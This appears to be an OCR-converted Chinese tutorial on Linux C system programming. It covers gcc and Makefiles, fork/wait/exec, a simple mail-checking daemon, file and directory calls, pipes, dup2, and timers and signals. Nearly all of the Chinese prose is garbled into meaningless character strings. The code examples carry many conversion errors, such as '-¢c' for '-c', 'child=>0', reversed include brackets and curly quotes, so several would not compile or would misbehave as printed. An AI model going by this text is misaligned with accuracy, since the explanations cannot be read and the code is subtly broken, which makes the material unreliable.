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R FRATAT N 1A HE T SRR (hello.c):

int main(int argc,char **argv)

{

printf(“Hello Linux\n”);
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}

B XA, AT H SR A AT N AT

gcc -o hello hello.c
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2.Makefile /{145

R B FAT AT X FER— MR YA R

/* main.c */

#include “mytooll1.h”

#include “mytool2.h”

int main(int argc,char **argv)

{

mytooll_print(“hello”);

mytool2_print(“hello”);

}

/* mytooll.h */

#ifndef _MYTOOL_1 H

#define_MYTOOL_1 H

void mytool1_print(char *print_str);

#endif

/* mytooll.c */

#include “mytooll.h”

void mytool1_print(char *print_str)

{

printf(“This is mytool1 print %s\n”,print_str);

}

/* mytool2.h */

#ifndef _MYTOOL_2 H

#define_MYTOOL_2_H

void mytool2_print(char *print_str);

#endif

/* mytool2.c */

#include “mytool2.h”

void mytool2_print(char *print_str)

{

printf(“This is mytool2 print %s\n”,print_str);

}
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AR TR AR SR AR B FRATT AT U A R G 16

gcc -¢c main.c

gcc -c mytooll.c

gcc -¢c mytool2.c

gcc -0 main main.o mytool1.0 mytool2.0

TR BATH AT L™ A main B, 100 HARAS ISR BRABL AR 2 an SR AT 1 7% 18— N i Ry —
RBAVME S T A ) — S0 (e i mytool1.c) B2 FAl T i i 2 25 g A\ L 18I 1 iy
B VFRE U IX AR 25 5 i el 35 — A~ SHELL JIAS, LE i 5 3 22 58 Ak aT LA T 22 (1)
XTI A A, A AT LA AR HT 0 AE R 2 AT T4 A AR ) B A 2% — i, A R FRAT TR
FPA U AN UERE Y (R IS i 2, B 2 B 8 BB — A AN G 122

h e HE T R UATIAR Y T — MR ) T BRSO A 1 X 2 make. AT AT LA
N make, f AT LA L TR e AR B AR FRATIIAT make 2 HT AT ESE S N AR T
A --Makefile T F TR BN FL K B, T BE ) —A™ Makefile ¥ 30 {442

# X 5T BN FET ) Makefile ST

main:main.o mytooll.0 mytool2.0

gcc -0 main main.o mytool1.0 mytool2.0

main.o:main.c mytool1.h mytool2.h

gcc -¢c main.c

mytooll.0:mytooll.c mytooll.h

gcc -¢ mytooll.c

mytool2.0:mytool2.c mytool2.h

gcc -¢ mytool2.c

A7 T 1A Makefile A AL AT TAT A IRz e T VAR P 24 7P (A A SO, AT AT
make i, FAT I Gt AR A8 L 23 23 G AN FRA MG S ST SR I ST, L e g SO i 1
HEAAL L HK).

NI 2] Makefile A& il 4 5 1.

71 Makefile H B4 46 (4T #5147 Makefile H 5 52 1) S il i SO (A 0% 2R 10t
B — B 3

target: components

TAB rule

B AT RN R OS2 AT S .

Lt A1 E i i) 8> Makefile SCEFIFISE —AT

main:main.o mytooll.0 mytool2.0

FERBATHY H b (target)main ()4 #5552 (components) & main.o mytool1.0 mytool2.0

AR AN BAE HARE B0 1E S0, SR AT R AT B € B a2 s R AT
TS Makefile 25 =47 st () —FE 24047 gee -0 main main.o mytooll.0 mytool2.0
TR 4T P 1) TAB 7R 8 HL2 — A TAB

Makefile 17 =M EH A HI AL & 73 0] 2 $@,$N S< AL 1= S0l e

$@-- H A3 $-- T A U ST $<-- 55— MU ST

R FATE ] b = AN AR A RATTRT AR AL F AT Makefile SCAF:

# X A5 ) Makefile

main:main.o mytooll.0 mytool2.0

gcc -0 $@ $°

main.o:main.c mytool1.h mytool2.h
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gee -¢ $<

mytooll.0:mytooll.c mytooll.h

gcc -c $<

mytool2.0:mytool2.c mytool2.h

gce -¢ $<

21 i J5 BATTY) Makefile J2 (&7 58 1 — fU AN AT AT I g s AR a7 B — R IX LR AT 2% )
—A> Makefile 45 L)

.c.0:

gce -¢ $<

EANFNRIR A .0 SCHFER RO AH M. 1R.c SCHH14.451 Wt mytool.o 46T~ mytool.c
IXFE Makefile i 7] LA 4y

# XL RS IR Makefile

main:main.o mytooll.0 mytool2.0

gcc -0 $@ $°

.c.o0:

gee -¢ $<

U7 AT Makefile 22N T 41 SRARKNE BE 2 19 5C T Makefile R AT LA AH Y. )
SCHY.

3P R

W g N XA

[* temp.c */

#include <math.h>

int main(int argc,char **argv)

{

double value;

printf(“Value:%f\n" value);

}

XA A G 7 B H 24 RAT TR gee -o temp temp.c 4 PRS2 BT T I R A 2.

/tmp/cc33Kydu.o: In function “main':

/tmp/cc33Kydu.o(.text+0xe): undefined reference to “log'

collect2: Id returned 1 exit status

HH AN R PR A 9 7 2 R AN 21 log (1 B AARSEIL. BARFRATTELAR 1 1=l i Sk e B2 3K
AVIAE SR P P TS A% 30 2 23 e ff 52 A P2 A Linux O 77 A 00 o B, BRAT LA 00 RN B0 e
R, L IRATTE N -Im &I, gec -0 temp temp.c -Im X FE A REMS 1E i 1 . AR
AN EL i), Fir i AT THT printf 5R 250 I 16 2 AT EERL e 202 X RE 1, 01— 283 HI R R
5Bl goe itk v HBh LB RS0 R RN T B A CXg0E 7. A
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PRI ARSI, — AN R VF 2 088, 1N — AR O] UGV 2 IERR AR AR R
NE AT INEERE. AR R G BN AE LU RS S T I I SRR (A
17 A ARG AT — RGBS AR A AR AR et A AP R G ) A R e L i L
GHFREARET AT X3S NARNEHRE, RAG T DR T A IDEEREAIN
SHRUE)CMERA. 0 T 7850 WA H 5, RGGEX R X 43 T A FFARES A5 3ERE 2 2
AT BHLZE, g AN S8 ARG . BT R R IR O 18 AT R AR IEAEA8 4T, B
FEREMERE IEAE SR — AR R i 4 1 ROR REEEAESR A CPU SKHAT fir &, 11 58 I &
WRCARLNT REIEAEREWCEHE,. X TR ARSI AR R RA T LA GRIER
i) LI PRGN AR o

2. HEFRMIFR K

RTHERATTAIE T R A 1D, BABAVEAFRVEFER) 1D We? R4 H getpid 7f
LAAS BIEFR Y 1D, 110 getppid 1) LAS S 520 A2 (612 1 F 1% e BOdE R IR g AR) 1) 1D,

#include <unistd>

pid_t getpid(void);

pid_t getppid(void);

ERR I A FR P IR 45 1A AR 02 oA T H P RS (0. RGN T 4R BIERR (W H 7 44 38 Ry R AT
PSR XA O R TR 8 AN — A P A — AN 1D R4
W H getuid W LA BIRERR Y BTG 1 1D. B T-HERRZE 3] L BRI Linux % R4 9 IR 2
BEATORY 0,20 T 3REL 8 PHR IR — AN 20H 7 1DXA ID MRS IR AT K
B REBIRR AR, @ RA A geteuid FoAN TP LA BIEFR A RCH 7 1D, FIHH 1D
AERT Y BEFEIE AT — N1 ID AT R04L ID R4 R H getgid Fl getegid 7T LA A7 3141 ID R 2L
211D

#include <unistd>

#include <sys/types.h>

uid_t getuid(void);

uid_t geteuid(void);

gid_t getgid(void);

git_t getegid(void);

A IR IRATIE 20 ] B AR S BB O 44 55455, 1IN I IRATT T LA AT getpwui
d K33,

struct passwd {

char *pw_name; /* BE4FR */
char *pw_passwd; /* FxH4 */
uid_t pw_uid; /* F{/* ID */

gid_t pw_gid; /* 411D */

char *pw_gecos; /* HFIREA */
char *pw_dir; /* HFIHE */
char *pw_shell; /* J1j)"'ff] SHELL */
j

#include <pwd.h>

#include <sys/types.h>

struct passwd *getpwuid(uid_t uid);
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TRTHTFRATAE X AN SRS R R EFRAT T 2T LA R R
#include <unistd.h>

#include <pwd.h>

#include <sys/types.h>

#include <stdio.h>

int main(int argc,char **argv)

{

pid_t my_pid,parent_pid;

uid_t my_uid,my_euid;

gid_t my_gid,my_egid;

struct passwd *my_info;

my_pid=getpid();

parent_pid=getppid();

my_uid=getuid();

my_euid=geteuid();

my_gid=getgid();

my_egid=getegid();

my_info=getpwuid(my_uid);

printf(“Process 1D:%ld\n”,my_pid);

printf(“Parent 1D:%Ild\n",parent_pid);

printf(“User ID:%ld\n”,my_uid);

printf(“Effective User 1D:%Ild\n",my_euid);
printf(“Group 1D:%ld\n",my_gid);

printf(“Effective Group 1D:%Id\n”,my_egid):
if(my_info)

{

printf(“My Login Name:%s\n” ,my_info->pw_name);
printf(“My Password :%s\n” ,my_info->pw_passwd);
printf(“My User ID :%ld\n”,my_info->pw_uid);
printf(“My Group ID :%ld\n”,my_info->pw_gid);
printf(“My Real Name:%s\n” ,my_info->pw_gecos);
printf(“My Home Dir :%s\n”, my_info->pw_dir);
printf(“My Work Shell:%s\n”, my_info->pw_shell);

}

}

3. MR A

QU —ANRERE A R SR AR ] o FRATT LEER ] fork eRBUB AT A T .

#include <unistd.h>

pid_t fork();

BT fork LUE, RG> 7 HERL XA T HERE A REA A 3 7 A
A ALK 1D FISCHERE 1D, FUAt 02 —HE S AT UERE se FE (clone) H C— . 2 AR G
PHAS— B FE IR RS A & SCRLOA T X3 QRN 7 HERE, AT 16 Z B i fork f3i2 1]
B, 24 fork fi ] SRIGCHR) IR i (N A2 AN R B2 TP R B Kt R 2 2 ) Fork R [-1, 75 001 f

%7 0 3k 84 It
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ork AR [ A B AE F o6 T AQ 3k RE fork iz [ BERER 1D, 1% T+ fork F#ERER 1] 0.3k,
ATHRARIEIZAN IR B R IX 3 ST RERR K. ACHFE A4 B g T U 2 i T AT 4
YOI T Linux & —AN 2 H P ARG LR — I S GV 2 10 H P45 RN TR A N
BEREA T RS AT S G T RERROR PR Y. — H P HERE R B A, S T HERE i AN
fork Ab4kEEHAT AT B0 4+ RGN PR AT I 5 FRAT A5 B T ERR AR S ARAT 1 AL FER L2 1.
B RERETE AT S5 IXAN I FA T AT LU HY wait 58 waitpid &8 .

#include <sys/types.h>

#include <sys/wait.h>

pid_t wait(int *stat_loc);

pid_t waitpid(pid_t pid,int *stat_loc,int options);

wait RGeSt R R 28 B 3 — A T RE R A5 el R AR B T M S R
WA RMRRE TR E R TR COA 4K T wait [R5 BIR [A] D i (R — AN 73
PR A ) wait H12 1] 7 E R 1D, 77 WAk [M]-1, F ¥ B 42 )R AL & errno.stat_loc J& 7~ BERE Y
1B HUIRA . TERE I exit,_exit BU#J2 return K EXAME. h T X /ME Linux &
T IUAN AR AN IR [E.

WIFEXITED | 7 HEFRIE i {E 2 F 0
WEXITSTATUS: A7 2E R 38 (4 72 IR R 0).

WIFSIGNALED: 1 BERE i T BOA SR A I 5 TR .

WTERMSIG: 72 ¥ 343 1115 55 (£ WIFSIGNALED h FIN A1 i ).

waitpid SEAFHE E 1K) T 0F AR B 2T 2R (5] 40 SR pid O iF 5 25448 kR (pid). 40 R
N O WEERHAT AR N4 1D A T4 A 1D AR R R BERRE. -1 I 45 [ T wait 18 ./ T--1 145
FRAEAT— N4 1D 25T pid 45X E I PEFE. stat_loc AT wait (175 X —#%. options 7] LAYk E
ACHEFRPRAS. T ABU P AME. WNOHANG: AL HEFR 7. RITR A1 4 ¥ 5 7 JE AR AEZE I . WUNTACHE
D: 24 7 BERE S RN waitpid 3 1], {E 5 3E R IR HRASAS AT 5 3.

SRR QN TR, 7 HERE— AT A R IR A TR R G, BATTR] LUE T &
ZoH M exec ] .exec AT H S 5 A%k

#include <unistd.h>

int execl(const char *path,const char *arg,...);

int execlp(const char *file,const char *arg,...);

int execle(const char *path,const char *arg,...);

int execv(const char *path,char *const argv[]);

int execvp(const char *file,char *const argv[]):

exec MR AT DABAT 45 52 BT . 5T exec Wi FI I PRANAR Ui il LS 2% 2 4 FM (man exec
0. FHEIAIRE AL A IR PRI RN -Im DR o U5

#include <unistd.h>

#include <sys/types.h>

#include <sys/wait.h>

#include <stdio.h>

#include <errno.h>

#include <math.h>

void main(void)

{

pid_t child;
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int status;

printf(“This will demostrate how to get child status\n”);

if((child=fork())==-1)

{

printf(“Fork Error :%s\n”,strerror(errno));

exit(1);

}

else if(child==0)

{

inti;

printf(“l am the child:%ld\n”,getpid());

for(i=0;i<1000000;i++) sin(i);

i=5;

printf(“l exit with %d\n”,i);

exit(i);

}

while(((child=wait(&status))==-1)&(errno==EINTR));

if(child==-1)

printf(“Wait Error:%s\n”,strerror(errno));

else if(!status)

printf(“Child %ld terminated normally return status is zero\n”,

child);

else if(WIFEXITED(status))

printf(“Child %ld terminated normally return status is %d\n”,

child, WEXITSTATUS(status));

else if(WIFSIGNALED(status))

printf(“Child %old terminated due to signal %d znot caught\n”,

child, WTERMSIG(status));

}

strerror R IR M) —ME E BRI HRTRAE KU 74T R

4. SPHEERER A

IR ARAE DOS WA 5 1t 25, AR M VFAIELE DOS o8 T 40’5 — AN L A7 A7
PAVE Y S 2 /DS T AHSCAIRTE Linux R4S — AN 5 A" IR T AR AR A 2 11 . 3k
AT UTARIL T LA E]. SEFR BT Linux & 2T 4 8AE R 4, ATt 2 A gm 5 A1
WA DA MR IRE S & £ PUT I IR A fr & Ja TN E&4T 5 SHELL st RATTH)
PEFFIRENG & 2871, RO IR A G SR AR XA — MR
S AR IR ) [00] 2SS A JRAT T AT ISR, 2 SRR L BRATTAT WA T, AN PR i e LR LA /) ]
WK A HE A ). T XA BB N i R A D s i A

Ja B HERE R B AR e SCHERE A — A R RS TR R SR SR AN IR TG
1857). A5 5 A F A I A d 7 BERE R AR .

#include <unistd.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <stdio.h>
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#include <errno.h>

#include <fcntl.h>

#include <signal.h>

/* Linux [ERAEAS AT HBAEHuME 2 /var/spool/mail/ I It 85k 48 >/
#define MAIL “/var/spool/mail/hoyt”

/* AR 10 #Pah >/

#define SLEEP_TIME 10

main(void)

{

pid_t child;

if((child=fork())==-1)

{

printf(“Fork Error:%s\n”,strerror(errno));
exit(1);

}

else if(child=>0)

while(1);
if(kill(getppid(),SIGTERM)==-1)

{

printf(“Kill Parent Error:%s\n”,strerror(errno));
exit(1);

}

{

int mailfd;

while(1)

{
if((mailfd=open(MAIL,0_RDONLY))!=-1)
{

fprintf(stderr,”%s”,"\007");

close(mailfd);

}

sleep(SLEEP_TIME);

}

}

}

PRAT AZEER A B AR BUEAR BTIIA SR, AR5 IR — N I AR XM P IS A R

2 M BECRRE  FRAT i T 2 RIS ANRE Y 50 ), PR B 50 Z AR T BL H 2k
R LGk P e IR 1 s A2 R TR 1] 5545 AFAS 18 Ol AR 3 FIE, 53 B
IR

4 T HERE AT A AR IR TG B L T R AN IR RS VPR R A
i ROy i I g WEHA JAYINE ¥ NS

% 10 w3t 84
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3)Linux P BT AT 1E

Linux ' SCAE A

i

A THEX— K28 linux R SO O AN BR B
SRR RS

S JE

H S SCPE IR A

B IE S

1. XIS

AR AR 2 ANIE T AR HEGE A ST FRAE K 5 B8 2 (fopen, fread, fwrite 4545). 2448
WRARANTE R TSR A TS L RATTHE I RGN SR SEBR b2 A g A A
JIR 55 .

ATRATT BT IF N SOPFREAT B 5 B A RO, JATTaT U T 22 48 1] 26 25 open A 111 56
RS AT 5340 close BRHGIEAT S HHRAE.

#include <fcntl.h>

#include <unistd.h>

#include <sys/types.h>

#include <sys/stat.h>

int open(const char *pathname,int flags);

int open(const char *pathname,int flags,mode_t mode);

int close(int fd);

open BHCH PRI pathname S 30 TEFT IT (S04 44 (R0 & BRAR A4 0K, B R U 78
T HAR R 1) flags W) LA R A —AME B LM 4L A

O_RDONLY: LUz 177 20F T FF A

O_WRONLY: LA -5 15 10 IS0,

O_RDWR: LA 5 (1) 77 20F T TF A

O_APPEND: LI I i) 2T IF 3044

O_CREAT: il gt — /3.

O_EXEC: W AEH T O_CREAT ifi H 3t B4 A7, it & KA — AN R,

O_NOBLOCK: LAFEFH %€ ) 7 XA T IHF— AN 30 A

O_TRUNC: i1 SR ST A7 A, W BR ST A

AT = AR R B AR RS U R T O_CREATE #3884 A TZAT ] open 1126
CAB AR R E mode B, ISR R SCAF I UG R AU .mode T LU U S LI AL 1

S_IRUSR H LA S_IWUSR HI A LLE
S_IXUSR I/ al LABRAT S_IRWXU JH /7 Al LB S 04T

S_IRGRP 4 nJLAiE S_IWGRP A r L5

S_IXGRP ZHA[ LAFHAT S_IRWXG 4] LA 5 AT

11 T3t 84

=
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S_IROTH A ARTLAEE S_IWOTH HABAATLLE

S_IXOTH HiAb AFTLLAT S_IRWXO HiAth A\ AT LA B AT

S_ISUID # & #4447 ID S_ISGID B 4447 ID

Tl Tt v LA B R AR A AN (KA A Linux S 5 ANEC7 R R U 25 PR .
00000. 55— 7 LR BEE I/ 1D A1 7m I B AL 1D, 58 = A M B CRIALBRA, 55 DY
P TR AR, d 7 s Se b N RO

BT T DA LA TR, 25 AR, A (AL B , O (f 4 AR A ) B 23X LAME (R

AN FATEE B I P BB AT 2 AT AL, A N B AT (R SO B E ] 7 1D A28 4
FATAT LM AR - L(B B Y ID)O(ALAT Ve ) 7(1+2+4) (A BURR AL FH B )
5(1+4)H 10705:

open(“temp”,0_CREAT,10705);

U SR FRA T FF ST By ,open 2l Al — AN SCPF IR A AT LT R ST T A 44 5 wT A
RHEAS SRR FF AT HAF T

I ERAE TS LA FRATT S S T, L 2 close gl Al LA T, b fd 2 JRATT G
I SCAHER T

SCHFFTTE T B BRAT TR SO AT S T FRAT 17T LA FH R 4 read 1 wrrite AT SO
B,

#include <unistd.h>

ssize_t read(int fd, void *buffer,size_t count);

ssize_t write(int fd, const void *buffer,size_t count);

fd SR PR AT B AT L 5 A 1 SO R buffer J2 JATTE SN SC#F P9 25 sl tH SCfE 251
POk count J& FRATTELEL S I EL

XTI S read MR E B SR (F) R count 575 2 buffer 223 X rh (e AR FATT 2
IR — AN 05 K22 ph1X), [ I 2 1] count.

IR read R T ICAFAISE RSB ME S B bR [FHE 2N T count. A U i fE S
W7 1A [, vy LA IR [F1 5 read 23R [FI-1, H & & errno 2 EINTR. 4278 T 30 #F
2k BRI, read £33 (9] 0.

write A buffer "5 count =75 BI04 fd v Dl I & (8] 52 R i 5 (R 414

N THTFRAT A A S XA S R TS

#include <unistd.h>

#include <fcntl.h>

#include <stdio.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <errno.h>

#include <string.h>

#define BUFFER_SIZE 1024

int main(int argc,char **argv)

{

int from_fd,to_fd;

int bytes_read,bytes_write;
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char buffer[BUFFER_SIZE];

char *ptr;

if(argc!=3)

{

fprintf(stderr,”Usage:%s fromfile tofile\n\a”,argv[0]);
exit(1);

}

1* FTFESCAE >/
if((from_fd=open(argv[1],0_RDONLY))==-1)

{

fprintf(stderr,”"Open %s Error:%s\n”,argv[1],strerror(errno));
exit(1);

}

/> IS */

if((to_fd=open(argv[2],0_WRONLY|O_CREAT,S_IRUSR|S_IWUSR))==-

{

fprintf(stderr,”Open %s Error:%s\n”,argv[2],strerror(errno));
exit(1);

}

7% LU ARG A — S22 L) 98 DUSCAF AR >/
while(bytes_read=read(from_fd,buffer,BUFFER_SIZE))
{

I AR AR T <
if((bytes_read==-1)&&(errno!=EINTR)) break;
else if(bytes_read>0)

{

ptr=buffer;
while(bytes_write=write(to_fd,ptr,bytes_read))
{

/* AR AT %
if((bytes_write==-1)&&(errno!=EINTR))break;
/* 558 T AT T */

else if(bytes_write==bytes_read) break;

I A5 7T iy ak8:s5 *~/

else if(bytes_write=>0)

{

ptr+=bytes_write;

bytes_read-=bytes_write;

}

}

1* SRR AR B R~/
if(bytes_write==-1)break;

}

}
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close(from_fd);

close(to_fd);

exit(0);

}

2. XA R

SO BAT &b R R R T FRAN] L 1T T R STPEASURR LAS, SO AT 6 e I 1)
NS

A7 I FAT T W SO A W] LABEAT S A (152, 5 4555 X AN I AT T T LU acce
ss PREL.

#include <unistd.h>

int access(const char *pathname,int mode);

pathname: /& 3144 Fr,mode & 341155 340 7 i) Jm M. ] DAH B R AR Bl AR T4 4
R_OK SCAH 1) BATE, W_OK SCAF ] L X_OK U AT LAAAT F_OK SCAAEAE A FAT I e Ty I
BREGR [E] 0,75 MU SRAT — A SRR I i [ -1

AN AR TRATTEESAT SO IR At Ja 1, T T T DA e 2 stat Bl fstat.

#include <sys/stat.h>

#include <unistd.h>

int stat(const char *file_name,struct stat *buf);

int fstat(int filedes,struct stat *buf);

struct stat {

dev_t st_dev; /* %55 */

ino_t st_ino; /* i */

mode_t st_mode; /* iz */

nlink_t st_nlink; /* &4 */

uid_t st_uid; /* H/ 1D */

gid_t st_gid; /* 20 1D */

dev_t st_rdev; /* HRLKM */

off_t st_off; /* X714k */

unsigned long st_blksize; /* Hk/~ */

unsigned long st_blocks; /* Lk */

time_t st_atime; /* HJg—KUi ] */

time_t st_mtime; /* &g —XBEf A */

time_t st_ctime; /* /5 — KSR [A] (F5 8 1) */

}

stat H AT G FT 1 SO, 1 fstat FAHIBTHT R IR SO AT H B 2 1R Pk st
mode. T8I JE AT AT LA B gs e 10 S0 2 ANl SIS A H o R SR T B
A3 1 J LA 22K .

S_ISLNK(st_mode): & & /& —Mi&EH:.S_ISREG & 5 & — M ST f4.S_ISDIR J& A5 /& —AH
3% S_ISCHR £/ —/ANFAF i #.S_ISBLK J& 75 & — ik #% S_ISFIFO 275 j2—4> FIFO XL
.S_ISSOCK /& 75 /& —~ SOCKET U, AT AE I i Yi W e 467 1 i JUAN %211

3. HRICIFHI AL

PERATI G R B, A N TG BITRATH 80 0 TARRR . C et T get
ewd KA LIXA (] .
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#include <unistd.h>

char *getcwd(char *buffer,size_t size);

PAHRE—A size K/ buffer,getewd 231 3RATT 41T (1 #5457 31 buffer H1. 412 buffer
AN, BB ik [B]-1 F1— AR

Linux $248% 7 5 (1) H S A B8 25, BATI 27 20 UAS HL AT SR8 T ) R 2

#include <dirent.h>

#include <unistd.h>

#include <fcntl.h>

#include <sys/types.h>

#include <sys/stat.h>

int mkdir(const char *path,mode_t mode);

DIR *opendir(const char *path);

struct dirent *readdir(DIR *dir);

void rewinddir(DIR *dir);

off_t telldir(DIR *dir);

void seekdir(DIR *dir,off_t off);

int closedir(DIR *dir);

struct dirent {

long d_ino;

off_t d_off;

unsigned short d_reclen;

char d_name[NAME_MAX+1]; /* XH-2Fk */

mkdir 1R 255 5 & FA 18— H 3%, opendir 311 —AN H 3% 4 LR Se A4 £ . readdir 52—
AT H 5% .rewinddir & F K B3 H s AERAT22 14 rewind %8+ .closedir /& 5G4
—/H %.telldir fil seekdir 1Ll 5 ftee Fll fseek PR %K.

NHEFRA TR A NEREMEFE A SE M RIZASHE A, BT X
ANSTAF R R AN B 4G SR N T 2 SR — A H S A Tt XA H 5 R T STPR RN
(LRGN

#include <unistd.h>

#include <stdio.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <dirent.h>

#include <time.h>

static int get_file_size_time(const char *filename)

{

struct stat statbuf;

if(stat(filename,&statbuf)==-1)

{

printf(“Get stat on %s Error:%6s\n”,

filename,strerror(errno));

return(-1);
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}

if(S_ISDIR(statbuf.st_mode))return(1);
if(S_ISREG(statbuf.st_mode))

printf(“%os size:%ld bytes\tmodified at %s”,

filename,statbuf.st_size,ctime(&statbuf.st_mtime));

return(0);

}

int main(int argc,char **argv)

{

DIR *dirp;

struct dirent *direntp;

int stats;

if(argc!=2)

{

printf(“Usage:%os filename\n\a”,argv[0]);
exit(1);

}
if(((stats=get_file_size_time(argv[1]))==0)||(stats==-1))exit(1);
if((dirp=opendir(argv[1]))==NULL)

{

printf(“Open Directory %s Error:%s\n”,

argv[1],strerror(errno));

exit(1);

}

while((direntp=readdir(dirp))!=NULL)
if(get_file_size_time(direntp-<d_name)==-1)break;

closedir(dirp);

exit(1);

}

4, EHELAT

Linux #2471 2 fd sE R 5E [ A2, te i more cat

SELE IR T < > | <<FFSETE I BRAEAT ALK LERIPENIE € RS 2 R AT B T4
TEX AR RSO R ST ] pipe v LLEIEE —AMEIE.

#include<unistd.h>

int pipe(int fildes[2]);

pipe A H A LG ANE TE GEAF G2 X)), 2410 F B D IRy, AT AT AV il SCAFlA £ fild
es[0],fildes[1]. 3L fildes[0] 2 H ki3 I SC AR A, 11 fildes[11)2& H 2k 5 (¥ SC A4l
Y

TESEFRAT v ATl i B A TR AR S AN RS, SRR SR AT T 1.

KT BEREIEAR VRGN (01 A R SR A

#include <stdio.h>

#include <stdlib.h>
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#include <unistd.h>

#include <string.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/wait.h>

#define BUFFER 255

int main(int argc,char **argv)

{

char buffer[BUFFER+1];

int fd[2];

if(argc!=2)

{

fprintf(stderr,”"Usage:%s string\n\a”,argv[0]);
exit(1);

}

if(pipe(fd)!=0)

{

fprintf(stderr,”Pipe Error:%s\n\a”,strerror(errno));
exit(1);

}

if(fork()==0)

{

close(fd[0]);

printf(“Child[%d] Write to pipe\n\a”,getpid());
snprintf(buffer,BUFFER,"%s”,argv[1]);
write(fd[1],buffer,strlen(buffer));
printf(“Child[%d] Quit\n\a”,getpid());

exit(0);

}

else

{

close(fd[1]);

printf(“Parent[%d] Read from pipe\n\a”,getpid());
memset(buffer,'\0',BUFFER+1);
read(fd[0],buffer,BUFFER);

printf(“Parent[%d] Read:%s\n”,getpid(),buffer);
exit(1);

}

}

N T SEBLEE SE 1) B A, FAT T R T 53 4h— A e # dup2.
#include <unistd.h>

int dup2(int oldfd,int newfd);
dup2 #5J1] oldfd SCAFHEATTARACE newfd SCAFHATT, [F] I 5% 4] newfd SCAFHIA T A1l A2 ¥t
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JIT A ) newfd #AF #8521 oldfd 1. i BAT1 2 — M5 3XAME 5K b S L D )
B AT

#include <unistd.h>

#include <stdio.h>

#include <errno.h>

#include <fcntl.h>

#include <string.h>

#include <sys/types.h>

#include <sys/stat.h>

#define BUFFER_SIZE 1024

int main(int argc,char **argv)

{

int fd;

char buffer[BUFFER_SIZE];

if(argc!=2)

{

fprintf(stderr,”"Usage:%s outfilename\n\a”,argv[0]);

exit(1);

}
if((fd=open(argv[1],0_WRONLY|O_CREAT|O_TRUNC,S_IRUSR|S_IWUSR))==-1)
{

fprintf(stderr,”"Open %s Error:%s\n\a”,argv[1],strerror(errno));
exit(1);

}

if(dup2(fd,STDOUT_FILENO)==-1)

{

fprintf(stderr,’Redirect Standard Out Error:%s\n\a”,strerror(errno));
exit(1);

}

fprintf(stderr,’Now,please input string”);

fprintf(stderr,”(To quit use CTRL+D)\n");

while(1)

{

fgets(buffer,BUFFER_SIZE,stdin);

if(feof(stdin))break;

write(STDOUT_FILENO, buffer,strlen(buffer));

}

exit(0);

}

U7 SO AT N S WIS B L, A Ui T S R A T SE E 2 T BLS Y —
SELLACH TIRIARE T T JATA] LA S — AN se BG4 dirmkdir,cp,mv 45455 0 SO A
[

A E S LA lle?

% 18 Ul 3k 84

=



Linux #1E RS T c iES AN

4)Linux PRI A&

HU 5 sLinux N BRI RS

KT AT > Linux R )3 R 15 B0 5

RN EEEZN

B [ (0] 2

TN ER A

1o IR FEFE 2 rp 34145 Bt AR 40 4w (K Rk 1), LG an A1 146 date fiv 4
(i 28 SR TN B FRATT AT LA T e 4

#include <time.h>

time_t time(time_t *tloc);

char *ctime(const time_t *clock);

time pAEGRIFI 1970 42 1 /3 1 H O sl LUK E A7 (L time_t 5402 i ANRLIZXAS s B IR
[P 0T T FRAT A8 AT 2B 5 LKA NG ERAT A F 55— R B PO B A o 4+ o

o XA BRI IR ISR R [ 5 - — N AT REEA. Thu Dec 7 14:58:59 2000 XA 74 #3

A B A [ 52 /1 h 26

2. ISR RGIE A IR TEET SERE AT A 18] EE A B AT TS 230647 I8 1) 23-#r
XA AT LU R T A R

#include <sys/time.h>

int gettimeofday(struct timeval *tv,struct timezone *tz);
strut timeval {

long tv_sec; /* Fb% */

long tv_usec; /* b */
j

gettimeofday #4 I A - AEAE G54 tv 2 Ttz — I IRATME T NULL kAR
#include <sys/time.h<
#include <stdio.h<

#include <math.h<

void function()

{

unsigned int i,j;

double y;
for(i=0;i<1000;i++)
for(j=0;j<1000;j++)
y=sin((double)i);

}

main()

{

struct timeval tpstart,tpend;
float timeuse;
gettimeofday(&tpstart,NULL);
function();
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gettimeofday(&tpend,NULL);

timeuse=1000000*(tpend.tv_sec-tpstart.tv_sec)+

tpend.tv_usec-tpstart.tv_usec;

timeuse/=1000000;

printf(*Used Time:%f\n”,timeuse);

exit(0);

}

XA Rt R BRI T I ), FAT T ) DU P XA RBEAT R e 1 e AR ik, o e e 00
LRI AEBN LA BI04 82 - Used Time:0.556070

3o VN Linux #E RGO NERRERAET 3 AN A FIHIBE TIN5
ITIMER_REAL: i /b SE B B /). 380 B g ) 4% 2 HY SIGALRM 15 5.
ITIMER_VIRTUAL: /b 47 25 I (8] (HEFZAAT (11 [8]). 7= 4 SIGVTALRM 15 5.
ITIMER_PROF:ile/b> HERE £ 20 I8 1) A0 28 e IN [1a) (CAy BE A 8 ST R IR 1) AN 22 A0 L i —
AN IR U5 3R G N AZIN TR 7 IS (0] 42 SIGPROF {5 5.

FARR AR R B0 :

#include <sys/time.h>

int getitimer(int which,struct itimerval *value);

int setitimer(int which,struct itimerval *newval,

struct itimerval *oldval);

struct itimerval {

struct timeval it_interval,

struct timeval it_value;

}

getitimer e& 4753 3 ) B TN 28 (14 I TR){E. LR A7 AT value 1 setitimer p&E05E [HIFE TN 2%
IS TEE A newval K IFME R AZTE oldval Hr. which R4 =ANTHI 25 s —A~.
itimerval £5F 7 it_value s/ I ], 243X ANME D O AR sl 2 AR N I 5 1. 4K
JEBEE y it_interval {H.

#include <sys/time.h>

#include <stdio.h>

#include <unistd.h>

#include <signal.h>

#include <string.h>

#define PROMPT “Itf i) C28 i 2 T b 4in\a”

char *prompt=PROMPT;

unsigned int len;

void prompt_info(int signo)

{

write(STDERR_FILENO,prompt,len);

}

void init_sigaction(void)

{

struct sigaction act;

act.sa_handler=prompt_info;

act.sa_flags=0;
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sigemptyset(&act.sa_mask);
sigaction(SIGPROF,&act,NULL);

}

void init_time()

{

struct itimerval value;
value.it_value.tv_sec=2;
value.it_value.tv_usec=0;
value.it_interval=value.it_value;
setitimer(ITIMER_PROF,&value,NULL);
}

int main()

{

len=strlen(prompt);

init_sigaction();

init_time();

while(1);

exit(0);

}
EABRTFEPITIR b G — MR,

5)Linux R A5 543

Linux T {5 5 Fi4F

W X T BATHE —F Linux TR S A2 R 5.

Linux T A5 5 A 2 e 2

R 5=

(RNl e

Hef5'5 s

— A4

1. fE5mA4

Linux FAIE 5 7T LAKEET DOS R INT 2i# i Windows " S A2 A — M 5 A )
